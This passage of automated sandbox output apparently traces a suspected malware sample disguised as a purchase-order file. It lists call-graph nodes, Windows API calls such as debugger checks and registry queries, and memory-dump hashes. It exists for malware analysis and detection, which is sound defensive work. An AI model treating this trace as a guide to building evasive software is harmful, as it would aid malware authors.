GetVolumeInformationW 103400->103405 103401 ad8953 AllocateAndInitializeSid 103401->103402 103402->103381 103402->103382 103402->103383 103402->103385 103402->103387 103402->103388 103402->103389 103402->103394 103402->103395 103402->103396 103402->103399 103402->103400 103402->103401 103402->103404 103403->103404 103404->103380 103405->103400 103406 ab5a3b 103407 ab5a45 103406->103407 103412 ab4f7c 103406->103412 103408 ab5a4b CreateThread 103407->103408 103409 ab51ae 103407->103409 103410 ab5a59 RtlExitUserThread 103408->103410 103416 ab5b1d 103410->103416 103411 ab4f88 103412->103411 103413 ab5d20 2 API calls 103412->103413 103415 ab4f99 103413->103415 103417 ab5d20 2 API calls 103416->103417 103418 ab5b3c 103417->103418 103418->103418 103419 4719dd 103424 404a30 103419->103424 103421 4719f1 103444 420f0a 52 API calls __cinit 103421->103444 103423 4719fb 103425 404a40 __ftell_nolock 103424->103425 103426 40d7f7 48 API calls 103425->103426 103427 404af6 103426->103427 103445 405374 103427->103445 103429 404aff 103452 40363c 103429->103452 103432 40518c 48 API calls 103433 404b18 103432->103433 103458 4064cf 103433->103458 103436 40d7f7 48 API calls 103437 404b32 103436->103437 103464 4049fb 103437->103464 103439 404b43 Mailbox 103439->103421 103440 4061a6 48 API calls 103443 404b3d _wcscat Mailbox __NMSG_WRITE 103440->103443 103441 40ce19 48 API calls 103441->103443 103442 4064cf 48 API calls 103442->103443 103443->103439 103443->103440 103443->103441 103443->103442 103444->103423 103478 42f8a0 103445->103478 103448 40ce19 48 API calls 103449 4053a7 103448->103449 103480 40660f 103449->103480 103451 4053b1 Mailbox 103451->103429 103453 403649 __ftell_nolock 103452->103453 103491 40366c GetFullPathNameW 103453->103491 103455 40365a 103456 406a63 48 API calls 103455->103456 103457 403669 103456->103457 103457->103432 103459 40651b 103458->103459 103463 4064dd ___crtGetEnvironmentStringsW 103458->103463 103462 41f4ea 48 API calls 103459->103462 103460 41f4ea 48 API calls 103461 404b29 103460->103461 103461->103436 103462->103463 103463->103460 103493 40bcce 103464->103493 103467 4741cc RegQueryValueExW 103469 474246 RegCloseKey 103467->103469 103470 4741e5 103467->103470 103468 404a2b 103468->103443 103471 41f4ea 48 API calls 103470->103471 103472 4741fe 103471->103472 103473 4047b7 48 API calls 103472->103473 103474 474208 RegQueryValueExW 103473->103474 103475 474224 103474->103475 103476 47423b 103474->103476 103477 406a63 48 API calls 103475->103477 103476->103469 103477->103476 103479 405381 GetModuleFileNameW 103478->103479 103479->103448 103481 42f8a0 __ftell_nolock 103480->103481 103482 40661c GetFullPathNameW 103481->103482 103483 406a63 48 API calls 103482->103483 103484 406643 103483->103484 103487 406571 103484->103487 103488 40657f 103487->103488 103489 40b18b 48 API calls 103488->103489 103490 40658f 103489->103490 103490->103451 103492 40368a 103491->103492 103492->103455 103494 40bce8 103493->103494 103498 404a0a RegOpenKeyExW 103493->103498 103495 41f4ea 48 API calls 103494->103495 103496 40bcf2 103495->103496 103497 41ee75 48 API calls 103496->103497 103497->103498 103498->103467 103498->103468 103499 abaaf0 103500 abab06 103499->103500 103504 abab57 103500->103504 103505 ab6490 103500->103505 103507 ab5f10 103505->103507 103508 ab5d90 103505->103508 103506 ab6084 SetFilePointerEx 103506->103507 103507->103506 103507->103508 103509 aefaf0 103508->103509 103510 aefafd 103509->103510 103513 aefb84 103509->103513 103512 aefb2a 103510->103512 103510->103513 103516 af032f 103512->103516 103528 af1a1b 21 API calls 2 library calls 103512->103528 103515 aefc05 103513->103515 103518 aefbda 103513->103518 103514 af08d6 103514->103504 103520 aefc38 103515->103520 103527 af0fe0 21 API calls __startOneArgErrorHandling 103515->103527 103516->103504 103518->103520 103521 af116e 103518->103521 103522 af1167 103518->103522 103519 aefc22 103519->103504 103520->103504 103530 af0fe0 21 API calls __startOneArgErrorHandling 103521->103530 103529 af0ff7 21 API calls __startOneArgErrorHandling 103522->103529 103525 af116c 103525->103504 103526 af1173 103526->103504 103527->103519 103528->103514 103529->103525 103530->103526 103531 47197b 103536 41dd94 103531->103536 103535 47198a 103537 41f4ea 48 API calls 103536->103537 103538 41dd9c 103537->103538 103539 41ddb0 103538->103539 103544 41df3d 103538->103544 103543 420f0a 52 API calls __cinit 103539->103543 103543->103535 103545 41df46 103544->103545 103546 41dda8 103544->103546 103576 420f0a 52 API calls __cinit 103545->103576 103548 41ddc0 103546->103548 103549 40d7f7 48 API calls 103548->103549 103550 41ddd7 GetVersionExW 103549->103550 103551 406a63 48 API calls 103550->103551 103552 41de1a 103551->103552 103577 41dfb4 103552->103577 103555 406571 48 API calls 103561 41de2e 103555->103561 103558 4724c8 103559 41dea4 GetCurrentProcess 103590 41df5f LoadLibraryA GetProcAddress 103559->103590 103560 41debb 103563 41df31 GetSystemInfo 103560->103563 103564 41dee3 103560->103564 103561->103558 103581 41df77 103561->103581 103566 41df0e 103563->103566 103584 41e00c 103564->103584 103568 41df21 103566->103568 103569 41df1c FreeLibrary 103566->103569 103568->103539 103569->103568 103570 41df29 GetSystemInfo 103573 41df03 103570->103573 103571 41def9 103587 41dff4 103571->103587 103573->103566 103575 41df09 FreeLibrary 103573->103575 103575->103566 103576->103546 103578 41dfbd 103577->103578 103579 40b18b 48 API calls 103578->103579 103580 41de22 103579->103580 103580->103555 103591 41df89 103581->103591 103595 41e01e 103584->103595 103588 41e00c 2 API calls 103587->103588 103589 41df01 GetNativeSystemInfo 103588->103589 103589->103573 103590->103560 103592 41dea0 103591->103592 103593 41df92 LoadLibraryA 103591->103593 103592->103559 103592->103560 103593->103592 103594 41dfa3 GetProcAddress 103593->103594 103594->103592 103596 41def1 103595->103596 103597 41e027 LoadLibraryA 103595->103597 103596->103570 103596->103571 103597->103596 103598 41e038 GetProcAddress 103597->103598 103598->103596 103599 4719ba 103604 41c75a 103599->103604 103603 4719c9 103605 40d7f7 48 API calls 103604->103605 103606 41c7c8 103605->103606 103612 41d26c 103606->103612 103609 41c865 103610 41c881 103609->103610 103615 41d1fa 48 API calls ___crtGetEnvironmentStringsW 103609->103615 103611 420f0a 52 API calls __cinit 103610->103611 103611->103603 103616 41d298 103612->103616 103615->103609 103617 41d2a5 103616->103617 103618 41d28b 103616->103618 103617->103618 103619 41d2ac RegOpenKeyExW 103617->103619 103618->103609 103619->103618 103620 41d2c6 RegQueryValueExW 103619->103620 103621 41d2e7 103620->103621 103622 41d2fc RegCloseKey 103620->103622 103621->103622 103622->103618 103623 478eb8 103627 44a635 103623->103627 103625 478ec3 103626 44a635 84 API calls 103625->103626 103626->103625 103628 44a66f 103627->103628 103632 44a642 103627->103632 103628->103625 103629 44a671 103639 41ec4e 81 API calls 103629->103639 103630 44a676 103633 40936c 81 API calls 103630->103633 103632->103628 103632->103629 103632->103630 103636 44a669 103632->103636 103634 44a67d 103633->103634 103635 40510d 48 API calls 103634->103635 103635->103628 103638 414525 61 API calls ___crtGetEnvironmentStringsW 103636->103638 103638->103628 103639->103630 103640 425dfd 103641 425e09 103640->103641 103677 427eeb GetStartupInfoW 103641->103677 103643 425e0e 103679 429ca7 GetProcessHeap 103643->103679 103645 425e66 103646 425e71 103645->103646 103764 425f4d 47 API calls 3 library calls 103645->103764 103680 427b47 103646->103680 103649 425e77 103650 425e82 __RTC_Initialize 103649->103650 103765 425f4d 47 API calls 3 library calls 103649->103765 103701 42acb3 103650->103701 103653 425e91 103654 425e9d GetCommandLineW 103653->103654 103766 425f4d 47 API calls 3 library calls 103653->103766 103720 432e7d GetEnvironmentStringsW 103654->103720 103657 425e9c 103657->103654 103661 425ec2 103733 432cb4 103661->103733 103664 425ec8 103665 425ed3 103664->103665 103768 42115b 47 API calls 3 library calls 103664->103768 103747 421195 103665->103747 103668 425edb 103669 425ee6 __wwincmdln 103668->103669 103769 42115b 47 API calls 3 library calls 103668->103769 103751 403a0f 103669->103751 103672 425efa 103673 425f09 103672->103673 103770 4213f1 47 API calls _doexit 103672->103770 103771 421186 47 API calls _doexit 103673->103771 103676 425f0e _fseek 103678 427f01 103677->103678 103678->103643 103679->103645 103772 42123a 30 API calls 2 library calls 103680->103772 103682 427b4c 103773 427e23 InitializeCriticalSectionAndSpinCount 103682->103773 103684 427b51 103685 427b55 103684->103685 103775 427e6d TlsAlloc 103684->103775 103774 427bbd 50 API calls 2 library calls 103685->103774 103688 427b5a 103688->103649 103689 427b67 103689->103685 103690 427b72 103689->103690 103776 426986 103690->103776 103693 427bb4 103784 427bbd 50 API calls 2 library calls 103693->103784 103696 427bb9 103696->103649 103697 427b93 103697->103693 103698 427b99 103697->103698 103783 427a94 47 API calls 4 library calls 103698->103783 103700 427ba1 GetCurrentThreadId 103700->103649 103702 42acbf _fseek 103701->103702 103703 427cf4 __lock 47 API calls 103702->103703 103704 42acc6 103703->103704 103705 426986 __calloc_crt 47 API calls 103704->103705 103707 42acd7 103705->103707 103706 42ad42 GetStartupInfoW 103715 42ae80 103706->103715 103717 42ad57 103706->103717 103707->103706 103708 42ace2 _fseek @_EH4_CallFilterFunc@8 103707->103708 103708->103653 103709 42af44 103793 42af58 LeaveCriticalSection _doexit 103709->103793 103711 42aec9 GetStdHandle 103711->103715 103712 426986 __calloc_crt 47 API calls 103712->103717 103713 42aedb GetFileType 103713->103715 103714 42ada5 103714->103715 103718 42add7 GetFileType 103714->103718 103719 42ade5 InitializeCriticalSectionAndSpinCount 103714->103719 103715->103709 103715->103711 103715->103713 103716 42af08 InitializeCriticalSectionAndSpinCount 103715->103716 103716->103715 103717->103712 103717->103714 103717->103715 103718->103714 103718->103719 103719->103714 103721 425ead 103720->103721 103722 432e8e 103720->103722 103727 432a7b GetModuleFileNameW 103721->103727 103794 4269d0 47 API calls __crtGetStringTypeA_stat 103722->103794 103725 432eb4 ___crtGetEnvironmentStringsW 103726 432eca FreeEnvironmentStringsW 103725->103726 103726->103721 103728 432aaf _wparse_cmdline 103727->103728 103729 425eb7 103728->103729 103730 432ae9 103728->103730 103729->103661 103767 42115b 47 API calls 3 library calls 103729->103767 103795 4269d0 47 API calls __crtGetStringTypeA_stat 103730->103795 103732 432aef _wparse_cmdline 103732->103729 103734 432cc5 103733->103734 103735 432ccd __NMSG_WRITE 103733->103735 103734->103664 103736 426986 __calloc_crt 47 API calls 103735->103736 103743 432cf6 __NMSG_WRITE 103736->103743 103737 432d4d 103738 421c9d _free 47 API calls 103737->103738 103738->103734 103739 426986 __calloc_crt 47 API calls 103739->103743 103740 432d72 103742 421c9d _free 47 API calls 103740->103742 103742->103734 103743->103734 103743->103737 103743->103739 103743->103740 103744 432d89 103743->103744 103796 432567 47 API calls 2 library calls 103743->103796 103797 426e20 IsProcessorFeaturePresent 103744->103797 103746 432d95 103746->103664 103748 4211a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 103747->103748 103750 4211e0 __IsNonwritableInCurrentImage 103748->103750 103812 420f0a 52 API calls __cinit 103748->103812 103750->103668 103752 471ebf 103751->103752 103753 403a29 103751->103753 103754 403a63 IsThemeActive 103753->103754 103813 421405 103754->103813 103758 403a8f 103825 403adb SystemParametersInfoW SystemParametersInfoW 103758->103825 103760 403a9b 103826 403d19 103760->103826 103762 403aa3 SystemParametersInfoW 103763 403ac8 103762->103763 103763->103672 103764->103646 103765->103650 103766->103657 103770->103673 103771->103676 103772->103682 103773->103684 103774->103688 103775->103689 103777 42698d 103776->103777 103779 4269ca 103777->103779 103780 4269ab Sleep 103777->103780 103785 4330aa 103777->103785 103779->103693 103782 427ec9 TlsSetValue 103779->103782 103781 4269c2 103780->103781 103781->103777 103781->103779 103782->103697 103783->103700 103784->103696 103786 4330b5 103785->103786 103790 4330d0 __calloc_impl 103785->103790 103787 4330c1 103786->103787 103786->103790 103792 427c0e 47 API calls __getptd_noexit 103787->103792 103789 4330e0 RtlAllocateHeap 103789->103790 103791 4330c6 103789->103791 103790->103789 103790->103791 103791->103777 103792->103791 103793->103708 103794->103725 103795->103732 103796->103743 103798 426e2b 103797->103798 103803 426cb5 103798->103803 103802 426e46 103802->103746 103804 426ccf _memset __call_reportfault 103803->103804 103805 426cef IsDebuggerPresent 103804->103805 103811 4281ac SetUnhandledExceptionFilter UnhandledExceptionFilter 103805->103811 103807 42a70c __crtGetStringTypeA_stat 6 API calls 103809 426dd6 103807->103809 103808 426db3 __call_reportfault 103808->103807 103810 428197 GetCurrentProcess TerminateProcess 103809->103810 103810->103802 103811->103808 103812->103750 103814 427cf4 __lock 47 API calls 103813->103814 103815 421410 103814->103815 103878 427e58 LeaveCriticalSection 103815->103878 103817 403a88 103818 42146d 103817->103818 103819 421491 103818->103819 103820 421477 103818->103820 103819->103758 103820->103819 103879 427c0e 47 API calls __getptd_noexit 103820->103879 103822 421481 103880 426e10 8 API calls __wctomb_s_l 103822->103880 103824 42148c 103824->103758 103825->103760 103827 403d26 __ftell_nolock 103826->103827 103828 40d7f7 48 API calls 103827->103828 103829 403d31 GetCurrentDirectoryW 103828->103829 103881 4061ca 103829->103881 103831 403d57 IsDebuggerPresent 103832 403d65 103831->103832 103833 471cc1 MessageBoxA 103831->103833 103834 403e3a 103832->103834 103836 471cd9 103832->103836 103837 403d82 103832->103837 103833->103836 103835 403e41 SetCurrentDirectoryW 103834->103835 103840 403e4e Mailbox 103835->103840 103997 41c682 48 API calls 103836->103997 103955 4040e5 103837->103955 103840->103762 103841 471ce9 103846 471cff SetCurrentDirectoryW 103841->103846 103846->103840 103878->103817 103879->103822 103880->103824 103999 41e99b 103881->103999 103885 4061eb 103886 405374 50 API calls 103885->103886 103887 4061ff 103886->103887 103888 40ce19 48 API calls 103887->103888 103889 40620c 103888->103889 104016 4039db 103889->104016 103891 406216 Mailbox 103892 406eed 48 API calls 103891->103892 103893 40622b 103892->103893 104028 409048 103893->104028 103896 40ce19 48 API calls 103897 406244 103896->103897 103898 40d6e9 55 API calls 103897->103898 103899 406254 Mailbox 103898->103899 103900 40ce19 48 API calls 103899->103900 103901 40627c 103900->103901 103902 40d6e9 55 API calls 103901->103902 103903 40628f Mailbox 103902->103903 103904 40ce19 48 API calls 103903->103904 103905 4062a0 103904->103905 103906 40d645 53 API calls 103905->103906 103907 4062b2 Mailbox 103906->103907 103908 40d7f7 48 API calls 103907->103908 103909 4062c5 103908->103909 104031 4063fc 103909->104031 103913 4062df 103914 4062e9 103913->103914 103915 471c08 103913->103915 103916 420fa7 _W_store_winword 59 API calls 103914->103916 103917 4063fc 48 API calls 103915->103917 103918 4062f4 103916->103918 103919 471c1c 103917->103919 103918->103919 103920 4062fe 103918->103920 103922 4063fc 48 API calls 103919->103922 103921 420fa7 _W_store_winword 59 API calls 103920->103921 103923 406309 103921->103923 103924 471c38 103922->103924 103923->103924 103925 406313 103923->103925 103926 405374 50 API calls 103924->103926 103927 420fa7 _W_store_winword 59 API calls 103925->103927 103928 471c5d 103926->103928 103929 40631e 103927->103929 103930 4063fc 48 API calls 103928->103930 103931 40635f 103929->103931 103933 471c86 103929->103933 103936 4063fc 48 API calls 103929->103936 103934 471c69 103930->103934 103932 40636c 103931->103932 103931->103933 103938 41c050 48 API calls 103932->103938 103937 406eed 48 API calls 103933->103937 103935 406eed 48 API calls 103934->103935 103939 471c77 103935->103939 103940 406342 103936->103940 103941 471ca8 103937->103941 103942 406384 103938->103942 103943 4063fc 48 API calls 103939->103943 103944 406eed 48 API calls 103940->103944 103945 4063fc 48 API calls 103941->103945 103946 411b90 48 API calls 103942->103946 103943->103933 103947 406350 103944->103947 103948 471cb5 103945->103948 103952 406394 103946->103952 103949 4063fc 48 API calls 103947->103949 103948->103948 103949->103931 103950 411b90 48 API calls 103950->103952 103952->103950 103953 4063fc 48 API calls 103952->103953 103954 4063d6 Mailbox 103952->103954 104047 406b68 48 API calls 103952->104047 103953->103952 103954->103831 103956 4040f2 __ftell_nolock 103955->103956 103957 47370e _memset 103956->103957 103958 40410b 103956->103958 103961 47372a GetOpenFileNameW 103957->103961 103959 40660f 49 API calls 103958->103959 103960 404114 103959->103960 104089 4040a7 103960->104089 103963 473779 103961->103963 103965 406a63 48 API calls 103963->103965 103967 47378e 103965->103967 103967->103967 103968 404129 104107 404139 103968->104107 103997->103841 104000 40d7f7 48 API calls 103999->104000 104001 4061db 104000->104001 104002 406009 104001->104002 104003 406016 __ftell_nolock 104002->104003 104004 406a63 48 API calls 104003->104004 104009 40617c Mailbox 104003->104009 104006 406048 104004->104006 104015 40607e Mailbox 104006->104015 104048 4061a6 104006->104048 104007 40614f 104008 40ce19 48 API calls 104007->104008 104007->104009 104011 406170 104008->104011 104009->103885 104010 40ce19 48 API calls 104010->104015 104012 4064cf 48 API calls 104011->104012 104012->104009 104013 4061a6 48 API calls 104013->104015 104014 4064cf 48 API calls 104014->104015 104015->104007 104015->104009 104015->104010 104015->104013 104015->104014 104017 4041a9 136 API calls 104016->104017 104018 4039fe 104017->104018 104019 403a06 104018->104019 104051 44c396 104018->104051 104019->103891 104022 472ff0 104023 421c9d _free 47 API calls 104022->104023 104025 472ffd 104023->104025 104024 404252 84 API calls 104024->104022 104026 404252 84 API calls 104025->104026 104027 473006 104026->104027 104027->104027 104029 41f4ea 48 API calls 104028->104029 104030 406237 104029->104030 104030->103896 104032 406406 104031->104032 104033 40641f 104031->104033 104034 406eed 48 API calls 104032->104034 104035 406a63 48 API calls 104033->104035 104036 4062d1 104034->104036 104035->104036 104037 420fa7 104036->104037 104038 420fb3 104037->104038 104039 421028 104037->104039 104046 420fd8 104038->104046 104086 427c0e 47 API calls __getptd_noexit 104038->104086 104088 42103a 59 API calls 4 library calls 104039->104088 104042 421035 104042->103913 104043 420fbf 104087 426e10 8 API calls __wctomb_s_l 104043->104087 104045 420fca 104045->103913 104046->103913 104047->103952 104049 40bdfa 48 API calls 104048->104049 104050 4061b1 104049->104050 104050->104006 104052 404517 83 API calls 104051->104052 104053 44c405 104052->104053 104054 44c56d 94 API calls 104053->104054 104055 44c417 104054->104055 104056 4044ed 64 API calls 104055->104056 104084 44c41b 104055->104084 104057 44c432 104056->104057 104058 4044ed 64 API calls 104057->104058 104059 44c442 104058->104059 104060 4044ed 64 API calls 104059->104060 104061 44c45d 104060->104061 104062 4044ed 64 API calls 104061->104062 104063 44c478 104062->104063 104064 404517 83 API calls 104063->104064 104065 44c48f 104064->104065 104066 42395c __crtGetStringTypeA_stat 47 API calls 104065->104066 104067 44c496 104066->104067 104068 42395c __crtGetStringTypeA_stat 47 API calls 104067->104068 104069 44c4a0 104068->104069 104070 4044ed 64 API calls 104069->104070 104071 44c4b4 104070->104071 104072 44bf5a GetSystemTimeAsFileTime 104071->104072 104073 44c4c7 104072->104073 104074 44c4f1 104073->104074 104075 44c4dc 104073->104075 104077 44c556 104074->104077 104078 44c4f7 104074->104078 104076 421c9d _free 47 API calls 104075->104076 104079 44c4e2 104076->104079 104081 421c9d _free 47 API calls 104077->104081 104080 44b965 118 API calls 104078->104080 104082 421c9d _free 47 API calls 104079->104082 104083 44c54e 104080->104083 104081->104084 104082->104084 104085 421c9d _free 47 API calls 104083->104085 104084->104022 104084->104024 104085->104084 104086->104043 104087->104045 104088->104042 104090 42f8a0 __ftell_nolock 104089->104090 104091 4040b4 GetLongPathNameW 104090->104091 104092 406a63 48 API calls 104091->104092 104093 4040dc 104092->104093 104094 4049a0 104093->104094 104095 40d7f7 48 API calls 104094->104095 104096 4049b2 104095->104096 104097 40660f 49 API calls 104096->104097 104098 4049bd 104097->104098 104099 4049c8 104098->104099 104105 472e35 104098->104105 104100 4064cf 48 API calls 104099->104100 104102 4049d4 104100->104102 104141 4028a6 104102->104141 104104 472e4f 104105->104104 104147 41d35e 60 API calls 104105->104147 104106 4049e7 Mailbox 104106->103968 104108 4041a9 136 API calls 104107->104108 104109 40415e 104108->104109 104110 473489 104109->104110 104112 4041a9 136 API calls 104109->104112 104111 44c396 122 API calls 104110->104111 104113 47349e 104111->104113 104114 404172 104112->104114 104115 4734a2 104113->104115 104116 4734bf 104113->104116 104114->104110 104117 40417a 104114->104117 104118 404252 84 API calls 104115->104118 104119 41f4ea 48 API calls 104116->104119 104120 404186 104117->104120 104121 4734aa 104117->104121 104118->104121 104148 40c833 104120->104148 104251 446b49 87 API calls _wprintf 104121->104251 104142 4028d7 ___crtGetEnvironmentStringsW 104141->104142 104143 4028b8 104141->104143 104144 41f4ea 48 API calls 104142->104144 104145 41f4ea 48 API calls 104143->104145 104146 4028ee 104144->104146 104145->104142 104146->104106 104147->104105
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: d$w
                                                                                                                                                                                                      • API String ID: 0-2400632791
                                                                                                                                                                                                      • Opcode ID: a9b5586f743ab2a5f442b90dc72b4b484d8e006f201055584434a6c965c10bc3
                                                                                                                                                                                                      • Instruction ID: e3fb16a763e84a7fe94f2ec4fce012ba40afd1aa34601fe17cd547f9193d0d3b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9b5586f743ab2a5f442b90dc72b4b484d8e006f201055584434a6c965c10bc3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BC13274968343EECA3557648C09BB67B346B61B30FCA0687F1578A3F3EB249D04D622

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 1249 42b043-42b080 call 42f8a0 1252 42b082-42b084 1249->1252 1253 42b089-42b08b 1249->1253 1254 42b860-42b86c call 42a70c 1252->1254 1255 42b0ac-42b0d9 1253->1255 1256 42b08d-42b0a7 call 427bda call 427c0e call 426e10 1253->1256 1257 42b0e0-42b0e7 1255->1257 1258 42b0db-42b0de 1255->1258 1256->1254 1262 42b105 1257->1262 1263 42b0e9-42b100 call 427bda call 427c0e call 426e10 1257->1263 1258->1257 1261 42b10b-42b110 1258->1261 1267 42b112-42b11c call 42f82f 1261->1267 1268 42b11f-42b12d call 433bf2 1261->1268 1262->1261 1298 42b851-42b854 1263->1298 1267->1268 1279 42b133-42b145 1268->1279 1280 42b44b-42b45d 1268->1280 1279->1280 1282 42b14b-42b183 call 427a0d GetConsoleMode 1279->1282 1283 42b463-42b473 1280->1283 1284 42b7b8-42b7d5 WriteFile 1280->1284 1282->1280 1303 42b189-42b18f 1282->1303 1289 42b55a-42b55f 1283->1289 1290 42b479-42b484 1283->1290 1286 42b7e1-42b7e7 GetLastError 1284->1286 1287 42b7d7-42b7df 1284->1287 1292 42b7e9 1286->1292 1287->1292 1293 42b663-42b66e 1289->1293 1294 42b565-42b56e 1289->1294 1296 42b48a-42b49a 1290->1296 1297 42b81b-42b833 1290->1297 1300 42b7ef-42b7f1 1292->1300 1293->1297 1299 42b674 1293->1299 1294->1297 1301 42b574 1294->1301 1304 42b4a0-42b4a3 1296->1304 1305 42b835-42b838 1297->1305 1306 42b83e-42b84e call 427c0e call 427bda 1297->1306 1302 42b85e-42b85f 1298->1302 1308 42b67e-42b693 1299->1308 1310 42b7f3-42b7f5 1300->1310 1311 42b856-42b85c 1300->1311 1312 42b57e-42b595 1301->1312 1302->1254 1313 42b191-42b193 1303->1313 1314 42b199-42b1bc GetConsoleCP 1303->1314 1315 42b4a5-42b4be 1304->1315 1316 42b4e9-42b520 WriteFile 1304->1316 1305->1306 1307 42b83a-42b83c 1305->1307 1306->1298 1307->1302 1318 42b699-42b69b 1308->1318 1310->1297 1320 42b7f7-42b7fc 1310->1320 1311->1302 1321 42b59b-42b59e 1312->1321 1313->1280 1313->1314 1322 42b1c2-42b1ca 1314->1322 1323 42b440-42b446 1314->1323 1324 42b4c0-42b4ca 1315->1324 1325 42b4cb-42b4e7 1315->1325 1316->1286 1317 42b526-42b538 1316->1317 1317->1300 1326 42b53e-42b54f 1317->1326 1327 42b6d8-42b719 WideCharToMultiByte 1318->1327 1328 42b69d-42b6b3 1318->1328 1330 42b812-42b819 call 427bed 1320->1330 1331 42b7fe-42b810 call 427c0e call 427bda 1320->1331 1332 42b5a0-42b5b6 1321->1332 1333 42b5de-42b627 WriteFile 1321->1333 1334 42b1d4-42b1d6 1322->1334 1323->1310 1324->1325 1325->1304 1325->1316 1326->1296 1335 42b555 1326->1335 1327->1286 1339 42b71f-42b721 1327->1339 1336 42b6c7-42b6d6 1328->1336 1337 42b6b5-42b6c4 1328->1337 1330->1298 1331->1298 1341 42b5b8-42b5ca 1332->1341 1342 42b5cd-42b5dc 1332->1342 1333->1286 1344 42b62d-42b645 1333->1344 1345 42b36b-42b36e 1334->1345 1346 42b1dc-42b1fe 1334->1346 1335->1300 1336->1318 1336->1327 1337->1336 1349 42b727-42b75a WriteFile 1339->1349 1341->1342 1342->1321 1342->1333 1344->1300 1352 42b64b-42b658 1344->1352 1347 42b370-42b373 1345->1347 1348 42b375-42b3a2 1345->1348 1353 42b200-42b215 1346->1353 1354 42b217-42b223 call 421688 1346->1354 1347->1348 1357 42b3a8-42b3ab 1347->1357 1348->1357 1358 42b77a-42b78e GetLastError 1349->1358 1359 42b75c-42b776 1349->1359 1352->1312 1361 42b65e 1352->1361 1355 42b271-42b283 call 4340f7 1353->1355 1369 42b225-42b239 1354->1369 1370 42b269-42b26b 1354->1370 1379 42b435-42b43b 1355->1379 1380 42b289 1355->1380 1363 42b3b2-42b3c5 call 435884 1357->1363 1364 42b3ad-42b3b0 1357->1364 1368 42b794-42b796 1358->1368 1359->1349 1366 42b778 1359->1366 1361->1300 1363->1286 1383 42b3cb-42b3d5 1363->1383 1364->1363 1371 42b407-42b40a 1364->1371 1366->1368 1368->1292 1374 42b798-42b7b0 1368->1374 1376 42b412-42b42d 1369->1376 1377 42b23f-42b254 call 4340f7 1369->1377 1370->1355 1371->1334 1375 42b410 1371->1375 1374->1308 1381 42b7b6 1374->1381 1375->1379 1376->1379 1377->1379 1389 42b25a-42b267 1377->1389 1379->1292 1384 42b28f-42b2c4 WideCharToMultiByte 1380->1384 1381->1300 1386 42b3d7-42b3ee call 435884 1383->1386 1387 42b3fb-42b401 1383->1387 1384->1379 1388 42b2ca-42b2f0 WriteFile 1384->1388 1386->1286 1394 42b3f4-42b3f5 1386->1394 1387->1371 1388->1286 1391 42b2f6-42b30e 1388->1391 1389->1384 1391->1379 1392 42b314-42b31b 1391->1392 1392->1387 1395 42b321-42b34c WriteFile 1392->1395 1394->1387 1395->1286 1396 42b352-42b359 1395->1396 1396->1379 1397 42b35f-42b366 1396->1397 1397->1387
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 932d5e09fce22460d026d46474cb082544f819b06526096441e0640c5341d979
                                                                                                                                                                                                      • Instruction ID: e0f5de3d63888374dd379d58e7dc1cccdf18031ddaac7846d59f909699946da1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 932d5e09fce22460d026d46474cb082544f819b06526096441e0640c5341d979
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3326175B022288BCB24DF55EC81AEAB7B5FF46314F5440DAE40AE7A81D7349D80CF96

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00403AA3,?), ref: 00403D45
                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00403AA3,?), ref: 00403D57
                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C1148,004C1130,?,?,?,?,00403AA3,?), ref: 00403DC8
                                                                                                                                                                                                        • Part of subcall function 00406430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403DEE,004C1148,?,?,?,?,?,00403AA3,?), ref: 00406471
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,00403AA3,?), ref: 00403E48
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B28F4,00000010), ref: 00471CCE
                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,004C1148,?,?,?,?,?,00403AA3,?), ref: 00471D06
